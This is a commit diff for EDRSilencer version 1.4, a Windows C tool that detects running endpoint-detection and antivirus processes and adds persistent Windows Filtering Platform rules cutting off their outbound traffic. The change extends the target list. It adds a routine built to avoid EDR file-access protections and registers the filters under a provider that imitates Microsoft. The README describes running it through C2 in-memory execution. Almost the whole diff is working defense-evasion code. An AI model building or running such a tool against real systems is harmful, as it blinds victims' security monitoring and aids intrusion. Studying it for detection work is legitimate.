Verion 1.4: bug fixes

Merge pull request #23 from danikdanik/patch-2
checking the SID structure for TokenIntegrityLevel
2026-06-08 17:07:11 +00:00 · 2024-11-03 23:52:18 +08:00 · 2024-11-03 23:43:54 +08:00 · 2024-11-03 15:52:39 +02:00 · 2024-11-03 15:43:31 +02:00 · 2024-11-03 21:42:48 +08:00
4 changed files with 390 additions and 96 deletions
@@ -9,6 +9,7 @@ char* edrProcess[] = {
    "SenseCncProxy.exe",
    "SenseSampleUploader.exe",
 // Elastic EDR
 	"winlogbeat.exe",
    "elastic-agent.exe",
    "elastic-endpoint.exe",
    "filebeat.exe",
@@ -53,45 +54,39 @@ char* edrProcess[] = {
 // FortiEDR
    "fortiedr.exe",
 // Cisco Secure Endpoint (Formerly Cisco AMP)
-    "sfc.exe"
+    "sfc.exe",
 // ESET Inspect
    "EIConnector.exe",
    "ekrn.exe",
 // Harfanglab EDR
    "hurukai.exe",
 //TrendMicro Apex One
    "CETASvc.exe",
    "WSCommunicator.exe",
    "EndpointBasecamp.exe",
    "TmListen.exe",
    "Ntrtscan.exe",
    "TmWSCSvc.exe",
    "PccNTMon.exe",
    "TMBMSRV.exe",
    "CNTAoSMgr.exe",
    "TmCCSF.exe"
 };
 BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
 // The "unblockall" feature will delete all filters that are based on the custom filter name
 WCHAR* filterName = L"Custom Outbound Filter";
 WCHAR* providerName = L"Microsoft Corporation";
 // provider description has to be unique because:
 // - avoid problem in adding persistent WFP filter to a provider (error 0x80320016)
 // - avoid removing legitimate WFP provider
 WCHAR* providerDescription = L"Microsoft Windows WFP Built-in custom provider.";
-// d78e1e87-8644-4ea5-9437-d809ecefc971
+BOOL inWfpFlag[sizeof(edrProcess) / sizeof(edrProcess[0])] = { FALSE };
 DEFINE_GUID(
   FWPM_CONDITION_ALE_APP_ID,
   0xd78e1e87,
   0x8644,
   0x4ea5,
   0x94, 0x37, 0xd8, 0x09, 0xec, 0xef, 0xc9, 0x71
 );
 // c38d57d1-05a7-4c33-904f-7fbceee60e82
 DEFINE_GUID(
   FWPM_LAYER_ALE_AUTH_CONNECT_V4,
   0xc38d57d1,
   0x05a7,
   0x4c33,
   0x90, 0x4f, 0x7f, 0xbc, 0xee, 0xe6, 0x0e, 0x82
 );
 // 4a72393b-319f-44bc-84c3-ba54dcb3b6b4
 DEFINE_GUID(
   FWPM_LAYER_ALE_AUTH_CONNECT_V6,
   0x4a72393b,
   0x319f,
   0x44bc,
   0x84, 0xc3, 0xba, 0x54, 0xdc, 0xb3, 0xb6, 0xb4
 );
 // Check if the running process is our list
 BOOL isInEdrProcessList(const char* procName) {
    for (int i = 0; i < sizeof(edrProcess) / sizeof(edrProcess[0]); i++) {
-        if (strstr(procName, edrProcess[i]) != NULL && !inWfpFlag[i]) {
+        if (strcmp(procName, edrProcess[i]) == 0 && !inWfpFlag[i]) {
            inWfpFlag[i] = TRUE;
            return TRUE;
        }
@@ -101,25 +96,30 @@ BOOL isInEdrProcessList(const char* procName) {
 // Add WFP filters for all known EDR process(s)
 void BlockEdrProcessTraffic() {
-    HANDLE hEngine;
+    DWORD result = 0;
-    FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
+    HANDLE hEngine = NULL;
-    HANDLE hProcessSnap;
+    HANDLE hProcessSnap = NULL;
-    HANDLE hModuleSnap;
+    HANDLE hModuleSnap = NULL;
-    PROCESSENTRY32 pe32;
+    PROCESSENTRY32 pe32 = {0};
    MODULEENTRY32 me32;
    BOOL isEdrDetected = FALSE;
    result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
    if (result != ERROR_SUCCESS) {
        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
        return;
    }
    EnableSeDebugPrivilege();
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
-        printf("[-] CreateToolhelp32Snapshot (of processes) failed with error code: 0x%x\n", GetLastError());
+        printf("[-] CreateToolhelp32Snapshot (of processes) failed with error code: 0x%x.\n", GetLastError());
        return;
    }
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hProcessSnap, &pe32)) {
-        printf("[-] Process32First failed with error code: 0x%x\n", GetLastError());
+        printf("[-] Process32First failed with error code: 0x%x.\n", GetLastError());
        CloseHandle(hProcessSnap);
        return;
    }
@@ -131,24 +131,50 @@ void BlockEdrProcessTraffic() {
            // Get full path of the running process
            HANDLE hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pe32.th32ProcessID);
            if (hProcess) {
-                WCHAR fullPath[MAX_PATH];
+                WCHAR fullPath[MAX_PATH] = {0};
                DWORD size = MAX_PATH;
-                QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
+                FWPM_FILTER_CONDITION0 cond = {0};
                FWPM_FILTER_CONDITION0 cond;
                FWPM_FILTER0 filter = {0};
-                FWP_BYTE_BLOB* appId;
+                FWPM_PROVIDER0 provider = {0};
-
+                GUID providerGuid = {0};
-                if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) {
+                FWP_BYTE_BLOB* appId = NULL;
-                    printf("    [-] FwpmGetAppIdFromFileName0 failed to get app ID.\n");
+                UINT64 filterId = 0;
                ErrorCode errorCode = CUSTOM_SUCCESS;
                QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
                errorCode = CustomFwpmGetAppIdFromFileName0(fullPath, &appId);
                if (errorCode != CUSTOM_SUCCESS) {
                    switch (errorCode) {
                        case CUSTOM_FILE_NOT_FOUND:
                            printf("    [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The file path cannot be found.\n", fullPath);
                            break;
                        case CUSTOM_MEMORY_ALLOCATION_ERROR:
                            printf("    [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Error occurred in allocating memory for appId.\n", fullPath);
                            break;
                        case CUSTOM_NULL_INPUT:
                            printf("    [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Please check your input.\n", fullPath);
                            break;
                        case CUSTOM_DRIVE_NAME_NOT_FOUND:
                            printf("    [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The drive name cannot be found.\n", fullPath);
                            break;
                        case CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME:
                            printf("    [-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Failed to convert drive name to DOS device name.\n", fullPath);
                            break;
                        default:
                            break;
                    }
                    CloseHandle(hProcess);
                    continue;
-                }
+                } 
-                // Setting up WFP filter and condition
+                // Sett up WFP filter and condition
                filter.displayData.name = filterName;
                filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
                filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
                filter.action.type = FWP_ACTION_BLOCK;
                UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;
                filter.weight.type = FWP_UINT64;
                filter.weight.uint64 = &weightValue;
                cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
                cond.matchType = FWP_MATCH_EQUAL;
                cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
@@ -156,15 +182,29 @@ void BlockEdrProcessTraffic() {
                filter.filterCondition = &cond;
                filter.numFilterConditions = 1;
-                UINT64 filterId;
+                 // Add WFP provider for the filter
-                DWORD result;
+                if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
                    filter.providerKey = &providerGuid;
                } else {
                    provider.displayData.name = providerName;
                    provider.displayData.description = providerDescription;
                    provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
                    result = FwpmProviderAdd0(hEngine, &provider, NULL);
                    if (result != ERROR_SUCCESS) {
                        printf("    [-] FwpmProviderAdd0 failed with error code: 0x%x.\n", result);
                    } else {
                        if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
                            filter.providerKey = &providerGuid;
                        }
                    }
                }
                // Add filter to both IPv4 and IPv6 layers
                result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
                if (result == ERROR_SUCCESS) {
                    printf("    Added WFP filter for \"%S\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId);
                } else {
-                    printf("    [-] Failed to add filter in IPv4 layer with error code: 0x%x\n", result);
+                    printf("    [-] Failed to add filter in IPv4 layer with error code: 0x%x.\n", result);
                }
                filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
@@ -172,13 +212,13 @@ void BlockEdrProcessTraffic() {
                if (result == ERROR_SUCCESS) {
                    printf("    Added WFP filter for \"%S\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId);
                } else {
-                    printf("    [-] Failed to add filter in IPv6 layer with error code: 0x%x\n", result);
+                    printf("    [-] Failed to add filter in IPv6 layer with error code: 0x%x.\n", result);
                }
-                FwpmFreeMemory0((void**)&appId);
+                FreeAppId(appId);
                CloseHandle(hProcess);
            } else {
-                printf("    [-] Could not open process \"%s\" with error code: 0x%x\n", pe32.szExeFile, GetLastError());
+                printf("    [-] Could not open process \"%s\" with error code: 0x%x.\n", pe32.szExeFile, GetLastError());
            }
        }
    } while (Process32Next(hProcessSnap, &pe32));
@@ -193,19 +233,45 @@ void BlockEdrProcessTraffic() {
 // Add block WFP filter to user-defined process
 void BlockProcessTraffic(char* fullPath) {
-    HANDLE hEngine;
+    DWORD result = 0;
-    FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
+    HANDLE hEngine = NULL;
-
+    WCHAR wFullPath[MAX_PATH] = {0};
    WCHAR wFullPath[MAX_PATH];
    DWORD size = MAX_PATH;
-    CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0]));
+    FWPM_FILTER_CONDITION0 cond = {0};
    FWPM_FILTER_CONDITION0 cond;
    FWPM_FILTER0 filter = {0};
    FWPM_PROVIDER0 provider = {0};
    GUID providerGuid = {0};
    FWP_BYTE_BLOB* appId = NULL;
    UINT64 filterId = 0;
    ErrorCode errorCode = CUSTOM_SUCCESS;
-    FWP_BYTE_BLOB* appId;
+    result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
-
+    if (result != ERROR_SUCCESS) {
-    if (FwpmGetAppIdFromFileName0(wFullPath, &appId) != ERROR_SUCCESS) {
+        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
-        printf("[-] FwpmGetAppIdFromFileName0 failed to get app ID. Please check if the process path is valid.\n");
+        return;
    }
    CharArrayToWCharArray(fullPath, wFullPath, sizeof(wFullPath) / sizeof(wFullPath[0]));
    errorCode = CustomFwpmGetAppIdFromFileName0(wFullPath, &appId);
    if (errorCode != CUSTOM_SUCCESS) {
        switch (errorCode) {
            case CUSTOM_FILE_NOT_FOUND:
                printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The file path cannot be found.\n", wFullPath);
                break;
            case CUSTOM_MEMORY_ALLOCATION_ERROR:
                printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Error occurred in allocating memory for appId.\n", wFullPath);
                break;
            case CUSTOM_NULL_INPUT:
                printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Please check your input.\n", wFullPath);
                break;
            case CUSTOM_DRIVE_NAME_NOT_FOUND:
                printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. The drive name cannot be found.\n", wFullPath);
                break;
            case CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME:
                printf("[-] CustomFwpmGetAppIdFromFileName0 failed to convert the \"%S\" to app ID format. Failed to convert drive name to DOS device name.\n", wFullPath);
                break;
            default:
                break;
        }
        return;
    }
@@ -214,6 +280,9 @@ void BlockProcessTraffic(char* fullPath) {
    filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
    filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
    filter.action.type = FWP_ACTION_BLOCK;
    UINT64 weightValue = 0xFFFFFFFFFFFFFFFF;
    filter.weight.type = FWP_UINT64;
    filter.weight.uint64 = &weightValue;
    cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
    cond.matchType = FWP_MATCH_EQUAL;
    cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
@@ -221,15 +290,29 @@ void BlockProcessTraffic(char* fullPath) {
    filter.filterCondition = &cond;
    filter.numFilterConditions = 1;
-    UINT64 filterId;
+    // Add WFP provider for the filter
-    DWORD result;
+    if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
        filter.providerKey = &providerGuid;
    } else {
        provider.displayData.name = providerName;
        provider.displayData.description = providerDescription;
        provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
        result = FwpmProviderAdd0(hEngine, &provider, NULL);
        if (result != ERROR_SUCCESS) {
            printf("[-] FwpmProviderAdd0 failed with error code: 0x%x.\n", result);
        } else {
            if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
                filter.providerKey = &providerGuid;
            }
        }
    }
    // Add filter to both IPv4 and IPv6 layers
    result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
    if (result == ERROR_SUCCESS) {
        printf("Added WFP filter for \"%s\" (Filter id: %d, IPv4 layer).\n", fullPath, filterId);
    } else {
-        printf("[-] Failed to add filter in IPv4 layer with error code: 0x%x\n", result);
+        printf("[-] Failed to add filter in IPv4 layer with error code: 0x%x.\n", result);
    }
    filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
@@ -237,31 +320,32 @@ void BlockProcessTraffic(char* fullPath) {
    if (result == ERROR_SUCCESS) {
        printf("Added WFP filter for \"%s\" (Filter id: %d, IPv6 layer).\n", fullPath, filterId);
    } else {
-        printf("[-] Failed to add filter in IPv6 layer with error code: 0x%x\n", result);
+        printf("[-] Failed to add filter in IPv6 layer with error code: 0x%x.\n", result);
    }
-    FwpmFreeMemory0((void**)&appId);
+    FreeAppId(appId);
    FwpmEngineClose0(hEngine);
    return;
 }
 // Remove all WFP filters previously created
 void UnblockAllWfpFilters() {
-    HANDLE hEngine;
+    HANDLE hEngine = NULL;
-    DWORD result;
+    DWORD result = 0;
-    HANDLE enumHandle;
+    HANDLE enumHandle = NULL;
-    FWPM_FILTER0** filters;
+    FWPM_FILTER0** filters = NULL;
    GUID providerGuid = {0};
    UINT32 numFilters = 0;
    BOOL foundFilter = FALSE;
    result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
    if (result != ERROR_SUCCESS) {
-        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
+        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
        return;
    }
    result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle);
    if (result != ERROR_SUCCESS) {
-        printf("[-] FwpmFilterCreateEnumHandle0 failed with error code: 0x%x\n", result);
+        printf("[-] FwpmFilterCreateEnumHandle0 failed with error code: 0x%x.\n", result);
        return;
    }
@@ -269,7 +353,7 @@ void UnblockAllWfpFilters() {
        result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters);
        if (result != ERROR_SUCCESS) {
-            printf("[-] FwpmFilterEnum0 failed with error code: 0x%x\n", result);
+            printf("[-] FwpmFilterEnum0 failed with error code: 0x%x.\n", result);
            FwpmFilterDestroyEnumHandle0(hEngine, enumHandle);
            FwpmEngineClose0(hEngine);
            return;
@@ -293,6 +377,17 @@ void UnblockAllWfpFilters() {
        }
    }
    if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
        result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
        if (result != ERROR_SUCCESS) {
            if (result != FWP_E_IN_USE) {
                printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x.\n", result);
            }
        } else {
            printf("Deleted custom WFP provider.\n");
        }
    }
    if (!foundFilter) {
        printf("[-] Unable to find any WFP filter created by this tool.\n");
    }
@@ -302,12 +397,13 @@ void UnblockAllWfpFilters() {
 // Remove WFP filter based on filter id
 void UnblockWfpFilter(UINT64 filterId) {
-    HANDLE hEngine;
+    HANDLE hEngine = NULL;
-    DWORD result;
+    DWORD result = 0;
    GUID providerGuid = {0};
    result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
    if (result != ERROR_SUCCESS) {
-        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x\n", result);
+        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
        return;
    }
@@ -322,12 +418,23 @@ void UnblockWfpFilter(UINT64 filterId) {
        printf("[-] Failed to delete filter id: %llu with error code: 0x%x.\n", filterId, result);
    }
    if (GetProviderGUIDByDescription(providerDescription, &providerGuid)) {
        result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
        if (result != ERROR_SUCCESS) {
            if (result != FWP_E_IN_USE) {
                printf("[-] FwpmProviderDeleteByKey0 failed with error code: 0x%x.\n", result);
            }
        } else {
            printf("Deleted custom WFP provider.\n");
        }
    }
    FwpmEngineClose0(hEngine);
 }
 void PrintHelp() {
    printf("Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>\n");
-    printf("Version: 1.1\n");
+    printf("Version: 1.4\n");
    printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:\n");
    printf("  EDRSilencer.exe blockedr\n\n");
    printf("- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):\n");
@@ -374,7 +481,7 @@ int main(int argc, char *argv[]) {
        UINT64 filterId = strtoull(argv[2], &endptr, 10);
        if (errno != 0) {
-            printf("[-] strtoull failed with error code: 0x%x\n", errno);
+            printf("[-] strtoull failed with error code: 0x%x.\n", errno);
            return 1;
        }
@@ -7,6 +7,7 @@ This tool offers the following features:
 - Remove all WFP filters created by this tool
 - Remove a specific WFP filter by filter id
 - Support to run in C2 with in-memory PE execution module (e.g., `BruteRatel's memexec`)
 - Some EDR controls (e.g., minifilter) deny access when a process attempts to obtain a file handle of its EDR processes (e.g., through `CreateFileW`). However, the `FwpmGetAppIdFromFileName0` API, which is used to obtain the FWP app id of the targeted EDR process, calls `CreateFileW` internally. To avoid this, a custom `FwpmGetAppIdFromFileName0` was implemented to construct the app id without invoking `CreateFileW`, thus preventing unexpected failures when adding a WFP filter to an EDR process
 The tool currently supports the following EDRs:
 - Microsoft Defender for Endpoint and Microsoft Defender Antivirus
@@ -22,6 +23,9 @@ The tool currently supports the following EDRs:
 - Palo Alto Networks Traps/Cortex XDR
 - FortiEDR
 - Cisco Secure Endpoint (Formerly Cisco AMP)
 - ESET Inspect
 - Harfanglab EDR
 - TrendMicro Apex One
 **As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in `EDRSilencer.c`) prove insufficient in blocking all alert, detection, or event forward traffic.**
@@ -46,7 +50,7 @@ Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>
 ## Compile
 ```
-x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c
+x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfwpuclnt
 ```
 ## Example
@@ -1,20 +1,20 @@
 #include "utils.h"
 BOOL CheckProcessIntegrityLevel() {
-    HANDLE hToken;
+    HANDLE hToken = NULL;
    DWORD dwLength = 0;
    PTOKEN_MANDATORY_LABEL pTIL = NULL;
-    DWORD dwIntegrityLevel;
+    DWORD dwIntegrityLevel = 0;
    BOOL isHighIntegrity = FALSE;
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &hToken)) {
        if (GetLastError() != ERROR_NO_TOKEN) {
-            printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError());
+            printf("[-] OpenThreadToken failed with error code: 0x%x.\n", GetLastError());
            return FALSE;
        }
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
-            printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError());
+            printf("[-] OpenProcessToken failed with error code: 0x%x.\n", GetLastError());
            return FALSE;
        }
    }
@@ -22,25 +22,32 @@ BOOL CheckProcessIntegrityLevel() {
    // Get the size of the integrity level information
    if (!GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &dwLength) && 
        GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
-        printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError());
+        printf("[-] GetTokenInformation failed with error code: 0x%x.\n", GetLastError());
        CloseHandle(hToken);
        return FALSE;
    }
    pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, dwLength);
    if (pTIL == NULL) {
-        printf("[-] LocalAlloc failed with error code:0x%x\n", GetLastError());
+        printf("[-] LocalAlloc failed with error code: 0x%x.\n", GetLastError());
        CloseHandle(hToken);
        return FALSE;
    }
    if (!GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, dwLength, &dwLength)) {
-        printf("[-] GetTokenInformation failed with error code:0x%x\n", GetLastError());
+        printf("[-] GetTokenInformation failed with error code: 0x%x.\n", GetLastError());
        LocalFree(pTIL);
        CloseHandle(hToken);
        return FALSE;
    }
    if (pTIL->Label.Sid == NULL || *GetSidSubAuthorityCount(pTIL->Label.Sid) < 1) {
        printf("[-] SID structure is invalid.\n");
        LocalFree(pTIL);
        CloseHandle(hToken);
        return FALSE;
    }
    dwIntegrityLevel = *GetSidSubAuthority(pTIL->Label.Sid, (DWORD)(UCHAR)(*GetSidSubAuthorityCount(pTIL->Label.Sid) - 1));
    if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID) {
@@ -57,22 +64,22 @@ BOOL CheckProcessIntegrityLevel() {
 // Enable SeDebugPrivilege to obtain full path of running processes
 BOOL EnableSeDebugPrivilege() {
 	HANDLE hToken = NULL;
-	TOKEN_PRIVILEGES tokenPrivileges = { 0 };
+	TOKEN_PRIVILEGES tokenPrivileges = {0};
    if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, TRUE, &hToken)) {
        if (GetLastError() != ERROR_NO_TOKEN) {
-            printf("[-] OpenThreadToken failed with error code:0x%x\n", GetLastError());
+            printf("[-] OpenThreadToken failed with error code: 0x%x.\n", GetLastError());
            return FALSE;
        }
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
-            printf("[-] OpenProcessToken failed with error code:0x%x\n", GetLastError());
+            printf("[-] OpenProcessToken failed with error code: 0x%x.\n", GetLastError());
            return FALSE;
        }
    }
 	if (!LookupPrivilegeValueA(NULL, "SeDebugPrivilege", &tokenPrivileges.Privileges[0].Luid)){
-        printf("[-] LookupPrivilegeValueA failed with error code:0x%x\n", GetLastError());
+        printf("[-] LookupPrivilegeValueA failed with error code: 0x%x.\n", GetLastError());
 		CloseHandle(hToken);
 		return FALSE;
 	}
@@ -81,7 +88,7 @@ BOOL EnableSeDebugPrivilege() {
 	tokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 	if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
-        printf("[-] AdjustTokenPrivileges failed with error code:0x%x\n", GetLastError());
+        printf("[-] AdjustTokenPrivileges failed with error code: 0x%x.\n", GetLastError());
 		CloseHandle(hToken);
 		return FALSE;
 	}
@@ -100,7 +107,140 @@ void CharArrayToWCharArray(const char charArray[], WCHAR wCharArray[], size_t wC
    int result = MultiByteToWideChar(CP_UTF8, 0, charArray, -1, wCharArray, wCharArraySize);
    if (result == 0) {
-        printf("[-] MultiByteToWideChar failed with error code:0x%x\n", GetLastError());
+        printf("[-] MultiByteToWideChar failed with error code: 0x%x.\n", GetLastError());
        wCharArray[0] = L'\0';
    }
-}
+}
 BOOL GetDriveName(PCWSTR filePath, wchar_t* driveName, size_t driveNameSize) {
    if (!filePath) {
        return FALSE;
    }
    const wchar_t *colon = wcschr(filePath, L':');
    if (colon && (colon - filePath + 1) < driveNameSize) {
        wcsncpy(driveName, filePath, colon - filePath + 1);
        driveName[colon - filePath + 1] = L'\0';
        return TRUE;
    } else {
        return FALSE;
    }
 }
 ErrorCode ConvertToNtPath(PCWSTR filePath, wchar_t* ntPathBuffer, size_t bufferSize) {
    WCHAR driveName[10];
    WCHAR ntDrivePath[MAX_PATH];
    if (!filePath || !ntPathBuffer) {
        return CUSTOM_NULL_INPUT;
    }
    if (!GetDriveName(filePath, driveName, sizeof(driveName) / sizeof(WCHAR))) {
        return CUSTOM_DRIVE_NAME_NOT_FOUND;
    }
    if (QueryDosDeviceW(driveName, ntDrivePath, sizeof(ntDrivePath) / sizeof(WCHAR)) == 0) {
        return CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME;
    }
    swprintf(ntPathBuffer, bufferSize, L"%ls%ls", ntDrivePath, filePath + wcslen(driveName));
    for (size_t i = 0; ntPathBuffer[i] != L'\0'; ++i) {
        ntPathBuffer[i] = towlower(ntPathBuffer[i]);
    }
    return CUSTOM_SUCCESS;
 }
 BOOL FileExists(PCWSTR filePath) {
    if (!filePath) {
        return FALSE;
    }
    DWORD fileAttrib = GetFileAttributesW(filePath);
    if (fileAttrib == INVALID_FILE_ATTRIBUTES) {
        return FALSE;
    }
    return TRUE;
 }
 ErrorCode CustomFwpmGetAppIdFromFileName0(PCWSTR filePath, FWP_BYTE_BLOB** appId) {
    if (!FileExists(filePath)) {
        return CUSTOM_FILE_NOT_FOUND;
    }
    WCHAR ntPath[MAX_PATH];
    ErrorCode errorCode = ConvertToNtPath(filePath, ntPath, sizeof(ntPath));
    if (errorCode != CUSTOM_SUCCESS) {
        return errorCode;
    }
    *appId = (FWP_BYTE_BLOB*)malloc(sizeof(FWP_BYTE_BLOB));
    if (!*appId) {
        return CUSTOM_MEMORY_ALLOCATION_ERROR;
    }
    (*appId)->size = wcslen(ntPath) * sizeof(WCHAR) + sizeof(WCHAR);
    (*appId)->data = (UINT8*)malloc((*appId)->size);
    if (!(*appId)->data) {
        free(*appId);
        return CUSTOM_MEMORY_ALLOCATION_ERROR;
    }
    memcpy((*appId)->data, ntPath, (*appId)->size);
    return CUSTOM_SUCCESS;
 }
 void FreeAppId(FWP_BYTE_BLOB* appId) {
    if (appId) {
        if (appId->data) {
            free(appId->data);
        }
        free(appId);
    }
 }
 // Get provider GUID by description
 BOOL GetProviderGUIDByDescription(PCWSTR providerDescription, GUID* outProviderGUID) {
    DWORD result = 0;
    HANDLE hEngine = NULL;
    HANDLE enumHandle = NULL;
    FWPM_PROVIDER0** providers = NULL;
    UINT32 numProviders = 0;
    result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
    if (result != ERROR_SUCCESS) {
        printf("[-] FwpmEngineOpen0 failed with error code: 0x%x.\n", result);
        return FALSE;
    }
    result = FwpmProviderCreateEnumHandle0(hEngine, NULL, &enumHandle);
    if (result != ERROR_SUCCESS) {
        printf("[-] FwpmProviderCreateEnumHandle0 failed with error code: 0x%x.\n", result);
        FwpmEngineClose0(hEngine);
        return FALSE;
    }
    result = FwpmProviderEnum0(hEngine, enumHandle, 100, &providers, &numProviders);
    if (result != ERROR_SUCCESS) {
        printf("[-] FwpmProviderEnum0 failed with error code: 0x%x.\n", result);
        FwpmEngineClose0(hEngine);
        return FALSE;
    }
    BOOL found = FALSE;
    for (UINT32 i = 0; i < numProviders; i++) {
        if (providers[i]->displayData.description != NULL) {
            if (wcscmp(providers[i]->displayData.description, providerDescription) == 0) {
                *outProviderGUID = providers[i]->providerKey;
                found = TRUE;
                break;
            }
        }   
    }
    if (providers) {
        FwpmFreeMemory0((void**)&providers);
    }
    FwpmProviderDestroyEnumHandle0(hEngine, enumHandle);
    FwpmEngineClose0(hEngine);
    return found;
 }
@@ -4,7 +4,50 @@
 #include <stdio.h>
 #include <tlhelp32.h>
 // d78e1e87-8644-4ea5-9437-d809ecefc971
 DEFINE_GUID(
   FWPM_CONDITION_ALE_APP_ID,
   0xd78e1e87,
   0x8644,
   0x4ea5,
   0x94, 0x37, 0xd8, 0x09, 0xec, 0xef, 0xc9, 0x71
 );
 // c38d57d1-05a7-4c33-904f-7fbceee60e82
 DEFINE_GUID(
   FWPM_LAYER_ALE_AUTH_CONNECT_V4,
   0xc38d57d1,
   0x05a7,
   0x4c33,
   0x90, 0x4f, 0x7f, 0xbc, 0xee, 0xe6, 0x0e, 0x82
 );
 // 4a72393b-319f-44bc-84c3-ba54dcb3b6b4
 DEFINE_GUID(
   FWPM_LAYER_ALE_AUTH_CONNECT_V6,
   0x4a72393b,
   0x319f,
   0x44bc,
   0x84, 0xc3, 0xba, 0x54, 0xdc, 0xb3, 0xb6, 0xb4
 );
 typedef enum ErrorCode {
    CUSTOM_SUCCESS = 0,
    CUSTOM_FILE_NOT_FOUND = 0x1,
    CUSTOM_MEMORY_ALLOCATION_ERROR = 0x2,
    CUSTOM_NULL_INPUT = 0x3,
    CUSTOM_DRIVE_NAME_NOT_FOUND = 0x4,
    CUSTOM_FAILED_TO_GET_DOS_DEVICE_NAME = 0x5,
 } ErrorCode;
 #define FWPM_FILTER_FLAG_PERSISTENT (0x00000001)
 #define FWPM_PROVIDER_FLAG_PERSISTENT (0x00000001)
 BOOL CheckProcessIntegrityLevel();
 BOOL EnableSeDebugPrivilege();
